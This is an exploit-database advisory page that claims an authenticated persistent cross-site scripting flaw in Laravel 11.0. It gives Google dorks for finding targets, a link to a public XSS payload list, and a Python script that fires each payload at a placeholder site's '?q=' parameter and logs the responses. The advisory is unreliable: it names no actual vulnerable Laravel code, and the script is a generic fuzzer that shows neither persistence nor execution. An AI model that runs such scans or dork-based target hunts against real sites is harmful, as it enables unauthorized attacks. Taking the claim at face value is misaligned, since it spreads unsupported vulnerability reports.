Laravel 11.0 Cross Site Scripting

2024.12.18
ir E1.Coders (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

/*! - # VULNERABILITY: Cross Site Scripting Laravel version 11.0  - # Authenticated Persistent XSS - # GOOGLE DORK: inurl:.com/?q= - # GOOGLE DORK: Site:.com/?q= - # DATE: 2024-12-01 - # SECURITY RESEARCHER:  E1.Coders - # VENDOR: LARAVEL [https://laravel.com/ ] - # SOFTWARE LINK: https://laravel.com/docs/11.x/installation - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C - # CWE: CWE-79 - # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt */     ### -- [ Info: ]   [i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website.   [i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=     ### -- [ Impact: ]   [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.     ### -- [ EXPLOIT : ]       import requests   # Target URL url = "https://TARGET.com/?q="   # Function to read payloads from a file def read_payloads(filename="payloads.txt"):     try:         with open(filename, "r") as f:             payloads = [line.strip() for line in f]         return payloads     except FileNotFoundError:         print(f"Error: File '{filename}' not found.")         return []   # Function to perform the request def xss_attack(url, payload):     full_url = url + payload     try:         response = requests.get(full_url)         return response.status_code, response.text # return status code and response text     except requests.exceptions.RequestException as e:         print(f"An error occurred during the request: {e}")         return None, None   # Main function to iterate over payloads and attack def main():     payloads = read_payloads()     if not payloads:         return       results = []     for payload in payloads:         status_code, response_text = xss_attack(url, payload)         if status_code:           results.append({"payload": payload, "status_code": status_code, "response": response_text})       #Save results to a file (Example, you might need to adjust based on your desired output)     with open("attack_results.txt", "w") as f:         for result in results:             f.write(f"Payload: {result['payload']}\n")             f.write(f"Status Code: {result['status_code']}\n")             f.write(f"Response: {result['response']}\n\n")   if __name__ == "__main__":     main()       ### -- [ Contacts: ]   [+] E-Mail: E1.Coders@Mail.Ru   [+] GitHub: @e1coders


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top